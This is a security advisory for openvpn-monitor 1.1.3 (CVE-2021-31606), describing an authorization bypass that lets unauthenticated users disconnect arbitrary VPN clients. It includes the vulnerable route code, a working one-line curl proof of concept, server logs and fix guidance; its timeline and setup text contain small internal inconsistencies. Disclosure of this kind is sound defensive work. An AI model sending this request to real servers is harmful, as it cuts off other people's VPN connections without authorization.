OpenVPN Monitor 1.1.3 Authorization Bypass / Denial Of Service

`#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
#############################################################  
#  
# Product: openvpn-monitor  
# Vendor: https://github.com/furlongm/openvpn-monitor  
# CSNC ID: CSNC-2021-009  
# CVE ID: CVE-2021-31606  
# Subject: Authorization Bypass  
# Severity: Medium  
# Effect: Denial of Service  
# Author: Emanuel Duss <[email protected]>  
# Sylvain Heiniger <[email protected]>  
# Date: 2021-09-22  
#  
#############################################################  
  
Introduction  
------------  
  
openvpn-monitor is a simple Python program to generate HTML that displays the  
status of an OpenVPN server, including all current connections. It uses the  
OpenVPN management console. It typically runs on the same host as the OpenVPN  
server. [0][1]  
  
During a customer project, several security vulnerabilities were discovered in  
this software.  
  
This advisory describes an authorization bypass which allows an attacker to  
disconnect arbitrary clients, even if the disconnect feature is disabled.  
  
  
Affected  
--------  
  
- Vulnerable: openvpn-monitor <= 1.1.3  
- Not vulnerable: none  
  
The vulnerability is already fixed in the source code [3], but there is no new  
release which contains the fix. Therefore, all currently available releases  
contain this vulnerability.  
  
  
Technical Description  
---------------------  
  
Starting the openvpn-monitor application without the  
`OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True` option in order to disable the  
disconnect functionality:  
  
# docker run --rm --name openvpn-monitor --net host \  
-e OPENVPNMONITOR_DEFAULT_DATETIMEFORMAT="%%H:%%M:%%S %%d/%%m/%%Y" \  
-e OPENVPNMONITOR_DEFAULT_LATITUDE=-37 \  
-e OPENVPNMONITOR_DEFAULT_LOGO=logo.jpg \  
-e OPENVPNMONITOR_DEFAULT_LONGITUDE=144 \  
-e OPENVPNMONITOR_DEFAULT_MAPS=True \  
-e OPENVPNMONITOR_DEFAULT_SITE=Test \  
-e OPENVPNMONITOR_SITES_0_ALIAS=UDP \  
-e OPENVPNMONITOR_SITES_0_HOST=127.0.0.1 \  
-e OPENVPNMONITOR_SITES_0_NAME=UDP \  
-e OPENVPNMONITOR_SITES_0_PORT=5555 \  
-e OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True \  
-p 80:80 ruimarinho/openvpn-monitor  
  
When the openvpn-monitor application is accessed, the disconnect button is not  
displayed (as expected).  
  
However, there is no authorization check implemented which check if the  
functionality is allowed to be used or not:  
  
[CUT BY COMPASS]  
@app.route('/', method='POST')  
def post_slash():  
vpn_id = request.forms.get('vpn_id')  
ip = request.forms.get('ip')  
port = request.forms.get('port')  
client_id = request.forms.get('client_id')  
return render(vpn_id=vpn_id, ip=ip, port=port, client_id=client_id)  
[CUT BY COMPASS]  
  
An attacker can use this to disconnect arbitrary clients:  
  
$ curl http://openvpn-monitor.example.net -d "vpn_id=UDP&ip=10.5.23.42&port=1194&client_id=5"  
  
The client will be disconnected. This can be seen in the OpenVPN server log:  
  
[CUT BY COMPASS]  
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555  
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'  
2021-04-21 11:33:22 MANAGEMENT: CMD 'client-kill 5'  
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'  
2021-04-21 11:33:22 MANAGEMENT: Client disconnected  
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555  
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'  
2021-04-21 11:33:22 MANAGEMENT: CMD 'state'  
2021-04-21 11:33:22 MANAGEMENT: CMD 'status 3'  
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'  
2021-04-21 11:33:22 MANAGEMENT: Client disconnected  
[CUT BY COMPASS]  
  
  
Vulnerability Classification  
----------------------------  
  
CVSS v3.1 Metrics [4]:  
  
* CVSS Base Score: 5.8  
* CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L  
  
  
Workaround / Fix  
----------------  
  
# openvpn-monitor Vendor  
  
Authorization checks should be implemented so that this functionality can only  
be used if `OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True` is enabled. This has to  
be enforced on the server and not on the client.  
  
# openvpn-monitor Users  
  
Users of the openvpn-monitor should either apply the patch which is available  
on GitHub [2] or use the latest version from the source code repository [1].  
  
  
Timeline  
--------  
  
2021-05-05: Vulnerability discovered  
2021-04-20: Requested CVE ID @ MITRE  
2021-04-20: Contacted vendor  
2021-04-22: Sent details via email to vendor  
2021-04-24: Vendor confirmed and already started to work on a fix  
2021-09-08: Asked vendor for updates  
2021-09-08: Vendor told it's OK to publish the advisory  
2021-09-22: Public disclosure  
  
  
References  
----------  
  
[0] http://openvpn-monitor.openbytes.ie/  
[1] https://github.com/furlongm/openvpn-monitor  
[2] https://github.com/furlongm/openvpn-monitor/commit/ddb9d31ef0ec56f578bdacf99ebe9d68455ed8ca  
[3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L&version=3.1  
  
  
`